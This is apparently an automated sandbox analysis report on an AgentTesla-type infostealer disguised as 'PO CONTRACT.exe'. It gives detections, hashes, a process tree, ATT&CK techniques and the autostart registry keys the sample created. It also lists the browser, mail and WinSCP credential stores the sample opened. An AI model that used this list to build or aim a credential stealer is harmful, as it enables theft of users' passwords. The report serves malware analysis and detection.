Source: Yara match | File source: 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.37462492550.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO CONTRACT.exe PID: 4388, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SOA.exe PID: 7300, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 6732, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 0.2.PO CONTRACT.exe.4044ef2.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.401c15a.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.3fe0f9a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.5747378.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.3fceb62.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.3fa5dca.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.4009d32.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.3fe0f9a.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.401c15a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.570c1d8.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.4044ef2.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.570c1d8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.4009d32.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.3fa5dca.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.5747378.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.40714268783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.37465940778.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.37462492550.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.40717853751.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO CONTRACT.exe PID: 4388, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SOA.exe PID: 7300, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 6732, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match | File source: 0.2.PO CONTRACT.exe.4044ef2.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.401c15a.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.3fe0f9a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.5747378.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.3fceb62.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.3fa5dca.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.4009d32.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.3fe0f9a.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.401c15a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.570c1d8.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.4044ef2.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.570c1d8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.4009d32.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.3fa5dca.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.5747378.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.40714268783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.37465940778.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.37462492550.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO CONTRACT.exe PID: 4388, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SOA.exe PID: 7300, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 6732, type: MEMORYSTR

MITRE ATT&CK Matrix

Flagged techniques per tactic (the digits in front of a technique are the report's count badges, reproduced as extracted; unflagged matrix cells are omitted):

Reconnaissance: none flagged
Resource Development: none flagged
Initial Access: 1 Valid Accounts
Execution: 121 Windows Management Instrumentation
Persistence: 1 DLL Side-Loading; 1 Valid Accounts; 21 Registry Run Keys / Startup Folder
Privilege Escalation: 1 DLL Side-Loading; 1 Valid Accounts; 1 Access Token Manipulation; 211 Process Injection; 21 Registry Run Keys / Startup Folder
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 DLL Side-Loading; 121 Masquerading; 1 Valid Accounts; 1 Modify Registry; 1 Access Token Manipulation; 251 Virtualization/Sandbox Evasion; 211 Process Injection; 1 Hidden Files and Directories
Credential Access: 2 OS Credential Dumping; 1 Input Capture; 1 Credentials in Registry
Discovery: 1 File and Directory Discovery; 24 System Information Discovery; 321 Security Software Discovery; 1 Process Discovery; 251 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
Lateral Movement: none flagged
Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 1 Input Capture
Command and Control: 1 Encrypted Channel
Exfiltration: none flagged
Impact: none flagged
Behavior Graph (ID: 1493192, Sample: PO CONTRACT.exe, Start date: 15/08/2024, Architecture: WINDOWS, Score: 100)

Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 7 other signatures

Process tree with dropped files, signatures and network activity per node:

PO CONTRACT.exe
    dropped: C:\Users\user\AppData\...\PO CONTRACT.exe.log, ASCII
    signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
    cmd.exe
        dropped: C:\Windows\SysWOW64\SOA.exe, PE32; C:\Windows\SysWOW64\SOA.exe:Zone.Identifier, ASCII
        signatures: Uses ping.exe to sleep; Drops executables to the windows directory (C:\Windows) and starts them
        SOA.exe
            signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions; 3 other signatures
            InstallUtil.exe
                dropped: C:\Users\user\AppData\Roaming\...\GUIVTme.exe, PE32
                signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 4 other signatures
        conhost.exe
        PING.EXE
        PING.EXE
    cmd.exe
        signature: Uses ping.exe to check the status of other devices and networks
        reg.exe
            signatures: Creates multiple autostart registry keys; Creates an autostart registry key pointing to binary in C:\Windows
        PING.EXE
            network: 127.0.0.1 unknown unknown
        conhost.exe
GUIVTme.exe
    conhost.exe
GUIVTme.exe
    conhost.exe

Antivirus detection, submitted sample (Source | Detection | Scanner | Label):
PO CONTRACT.exe | 34% | Virustotal | -
PO CONTRACT.exe | 100% | Joe Sandbox ML | -
PO CONTRACT.exe | 47% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

Antivirus detection, dropped files (Source | Detection | Scanner | Label):
C:\Windows\SysWOW64\SOA.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | 0% | ReversingLabs | -
C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | 0% | Virustotal | -
C:\Windows\SysWOW64\SOA.exe | 47% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
C:\Windows\SysWOW64\SOA.exe | 57% | Virustotal | -

No Antivirus matches
No Antivirus matches

Antivirus detection, URLs (Source | Detection | Scanner | Label):
http://go.mic | 0% | Avira URL Cloud | safe
https://account.dyn.com/ | 0% | Avira URL Cloud | safe
https://account.dyn.com/ | 0% | Virustotal | -

No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
https://account.dyn.com/ | PO CONTRACT.exe, 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, PO CONTRACT.exe, 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, PO CONTRACT.exe, 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, SOA.exe, 0000000A.00000002.37465940778.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, SOA.exe, 0000000A.00000002.37462492550.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.40714268783.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://go.mic | PO CONTRACT.exe, 00000000.00000002.35998232560.0000000001223000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
127.0.0.1 | | | | | |
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1493192
                    Start date and time:2024-08-15 05:07:56 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 16m 34s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name:Suspected Instruction Hammering
Number of new started processes analysed:17
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:PO CONTRACT.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@23/10@0/1
                    EGA Information:
                    • Successful, ratio: 60%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 191
                    • Number of non-executed functions: 7
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                    • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                    • Excluded domains from analysis (whitelisted): login.live.com, clients.config.office.net
                    • Execution Graph export aborted for target GUIVTme.exe, PID 2092 because it is empty
                    • Execution Graph export aborted for target GUIVTme.exe, PID 7400 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
05:10:40 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SOA C:\Windows\SysWOW64\SOA.exe
05:10:48 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SOA C:\Windows\SysWOW64\SOA.exe
05:13:06 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run GUIVTme C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
05:13:14 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run GUIVTme C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
23:10:34 | API Interceptor | 1x Sleep call for process: PO CONTRACT.exe modified
23:10:37 | API Interceptor | 23x Sleep call for process: PING.EXE modified
23:12:29 | API Interceptor | 45593x Sleep call for process: SOA.exe modified
                    No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | image.exe | malicious | AgentTesla, DarkTortilla
 | ABA NEW ORDER No.2400228341.pdf.exe | malicious | AsyncRAT
 | 09099627362726.exe | malicious | AgentTesla
 | SecuriteInfo.com.Win32.TrojanX-gen.10530.8108.exe | malicious | DarkTortilla, XWorm
 | 719#U665a) HBL# LMSIN2407028 (by SEA) PO# 4500577338, by 1x40' HQ.pdf.scr.exe | malicious | DarkTortilla, XWorm
 | ISF - SO.4985 KEL-RIO GRANPE HBL#KELRIG2406221.scr.exe | malicious | DarkTortilla, XWorm
 | F46VBJ6Yvy.exe | malicious | AgentTesla
 | @#U570b#U5167DEBIT#U5e33#U55ae[#U4e2d#U6587#U672c#U5e63]-OI(K)_20240612161821.scr.exe | malicious | DarkTortilla, XWorm
 | SPECIFICATIONS.exe | malicious | AgentTesla
 | order .exe | malicious | AgentTesla
                                        Process:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                        File Type:CSV text
                                        Category:modified
                                        Size (bytes):1089
                                        Entropy (8bit):5.350878246466478
                                        Encrypted:false
                                        SSDEEP:24:ML9E4K1BIKNE4oKeK/KDE4KhKMaKhPKIE4oKnKoZAE4KzDq:MxHK1BIIHoN6YHKh6oPtHoAhAHKz2
                                        MD5:3DF7215F3D1C16DF69CB59389AFAE1DC
                                        SHA1:3B4C5463A2C1C010165A52A6D21CAD1754F8FDF1
                                        SHA-256:5177DF81DE3C4443AAD26F5EE1936056E8DB3CC0C8E39598008FC18F872EBEF6
                                        SHA-512:F3C481491E4613657B6275465357020C78257442D920384A01A345D2C5AC259001BC77BD446BE6F1080C23AB4FCAFF480E186508CCD310FA137D228D14C6945A
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\989d48bf1bfc9e3c8d60c09e2a6a7c0d\System.Configuration.Install.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\b863adc9d550931e279ac7e2ee517d1f\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\Nati
                                        Process:C:\Users\user\Desktop\PO CONTRACT.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.354384827676232
                                        Encrypted:false
                                        SSDEEP:24:MLU84qpE4K1BIKDE4KhKMaKhIE4Kx1qE4qXKIE4oKnKoZAE4KzD1E4j:Mgv2HK1BIYHKh6oIHKx1qHitHoAhAHKF
                                        MD5:7FF110659768EC79159C246BDB73C73E
                                        SHA1:74324029A26FB732C84B53EEE75898DB164773AD
                                        SHA-256:AC007C5DB9F6A64B76C3533B3A45E8539D3FE9D688D560AD5EA2F7226206662A
                                        SHA-512:85AC71E7D41DAA871E35949048A464BB315EC890ECE793FDD3F5FA38043104EDFD5D7E2368A8D3908ACCB08252A8295B303E3BE20EAA9664F1EFA7ED8BB46CAC
                                        Malicious:true
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\b863adc9d550931e279ac7e2ee517d1f\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:modified
                                        Size (bytes):42064
                                        Entropy (8bit):6.19564898727408
                                        Encrypted:false
                                        SSDEEP:384:qtpFVLK0MsihB9VKS7xdgl6KJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+RPZTg:GBMs2SqdSZ6Iq8BxTfqWR8h7ukP
                                        MD5:5D4073B2EB6D217C19F2B22F21BF8D57
                                        SHA1:F0209900FBF08D004B886A0B3BA33EA2B0BF9DA8
                                        SHA-256:AC1A3F21FCC88F9CEE7BF51581EAFBA24CC76C924F0821DEB2AFDF1080DDF3D3
                                        SHA-512:9AC94880684933BA3407CDC135ABC3047543436567AF14CD9269C4ADC5A6535DB7B867D6DE0D6238A21B94E69F9890DBB5739155871A624520623A7E56872159
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: image.exe, Detection: malicious
• Filename: ABA NEW ORDER No.2400228341.pdf.exe, Detection: malicious
• Filename: 09099627362726.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.TrojanX-gen.10530.8108.exe, Detection: malicious
• Filename: 719#U665a) HBL# LMSIN2407028 (by SEA) PO# 4500577338, by 1x40' HQ.pdf.scr.exe, Detection: malicious
• Filename: ISF - SO.4985 KEL-RIO GRANPE HBL#KELRIG2406221.scr.exe, Detection: malicious
• Filename: F46VBJ6Yvy.exe, Detection: malicious
• Filename: @#U570b#U5167DEBIT#U5e33#U55ae[#U4e2d#U6587#U672c#U5e63]-OI(K)_20240612161821.scr.exe, Detection: malicious
• Filename: SPECIFICATIONS.exe, Detection: malicious
• Filename: order .exe, Detection: malicious
Preview:MZ header, "This program cannot be run in DOS mode", PE header with .text, .rsrc and .reloc sections (remaining binary content of the PE32 file omitted)
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):2417152
                                        Entropy (8bit):7.810080552532674
                                        Encrypted:false
                                        SSDEEP:49152:2To7KY/EhaBB4q38SQxZTC7YXepIt8RAF5IVIHo8:2M7j38/+eoAjId8
                                        MD5:E9E7439B7D1098424BFC0BC877B7B2C2
                                        SHA1:5E0660202B12DB946AE396FD8252111D5EAAEA73
                                        SHA-256:7787902137178990EFE8CB5974196101405CAB9C70332FBBD45F546FD4FCB04C
                                        SHA-512:B018A676A4C6540F1C17E17BBA5B08B37F7ABD8E9F30FED266DF8743146746D3B10458D01113D553D23FEDC356A9888700F8C0F5FA6F3EA22EA06F7CF7F9977A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 47%
• Antivirus: Virustotal, Detection: 57%
Preview:MZ header, "This program cannot be run in DOS mode", PE header with .text, .rsrc and .reloc sections (remaining binary content of the PE32 file omitted)
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        Process:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2017
                                        Entropy (8bit):4.659840607039457
                                        Encrypted:false
                                        SSDEEP:48:zK4QsD4ql0+1AcJRy0EJP64gFljVlWo3ggxUnQK2qmBvgw1+5:zKgDEcTytNe3Wo3uQVBIe+5
                                        MD5:3BF802DEB390033F9A89736CBA5BFAFF
                                        SHA1:25A7177A92E0283B99C85538C4754A12AC8AD197
                                        SHA-256:5202EB464D6118AC60F72E89FBAAACF1FB8CF6A232F98F47F88D0E7B2F3AFDB3
                                        SHA-512:EB4F440D28ECD5834FD347F43D4828CA9FEE900FF003764DD1D18B95E0B84E414EAECF70D75236A1463366A189BC5CBA21613F79B5707BF7BDB3CEA312CCE4F7
                                        Malicious:false
                                        Preview:Microsoft (R) .NET Framework Installation utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....Usage: InstallUtil [/u | /uninstall] [option [...]] assembly [[option [...]] assembly] [...]]....InstallUtil executes the installers in each given assembly...If the /u or /uninstall switch is specified, it uninstalls..the assemblies, otherwise it installs them. Unlike other..options, /u applies to all assemblies, regardless of where it..appears on the command line.....Installation is done in a transactioned way: If one of the..assemblies fails to install, the installations of all other..assemblies are rolled back. Uninstall is not transactioned.....Options take the form /switch=[value]. Any option that occurs..before the name of an assembly will apply to that assembly's..installation. Options are cumulative but overridable - options..specified for one assembly will apply to the next as well unless..the option is specified with a new value. The default for
                                        Process:C:\Windows\SysWOW64\PING.EXE
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2342
                                        Entropy (8bit):4.725019911843614
                                        Encrypted:false
                                        SSDEEP:12:PKMRJpTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTL:/Q/5AokItULVDv
                                        MD5:7A559C3B1494D896C79D9CA23EA8A48F
                                        SHA1:93713262CF69081EF835824234A91FF57910C861
                                        SHA-256:8FFB12299478980F44C9E70949F03031BBCA244270E08C429D39807601AE9433
                                        SHA-512:CC78AF792F52DB67355BE5A5E58D6813E460744CC1B6E3BD4B90B17C6EB919A252BF56184F96F7CF02D72BDA235BC6C19B52BC58CFC17195B37A0F5828201609
                                        Malicious:false
                                        Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: byt
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.810080552532674
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:PO CONTRACT.exe
                                        File size:2'417'152 bytes
                                        MD5:e9e7439b7d1098424bfc0bc877b7b2c2
                                        SHA1:5e0660202b12db946ae396fd8252111d5eaaea73
                                        SHA256:7787902137178990efe8cb5974196101405cab9c70332fbbd45f546fd4fcb04c
                                        SHA512:b018a676a4c6540f1c17e17bba5b08b37f7abd8e9f30fed266df8743146746d3b10458d01113d553d23fedc356a9888700f8c0f5fa6f3ea22ea06f7cf7f9977a
                                        SSDEEP:49152:2To7KY/EhaBB4q38SQxZTC7YXepIt8RAF5IVIHo8:2M7j38/+eoAjId8
                                        TLSH:BEB5338A53C7996ED52CCDB2002575D8D371E0A3411BEB4CA5DC13F94B8BBEBE726092
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....S.2..................$...........$.. ....%...@.. .......................@%...........`................................
                                        Icon Hash:90cececece8e8eb0
                                        Entrypoint:0x64f9be
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x32FF53EB [Mon Feb 10 16:59:23 1997 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
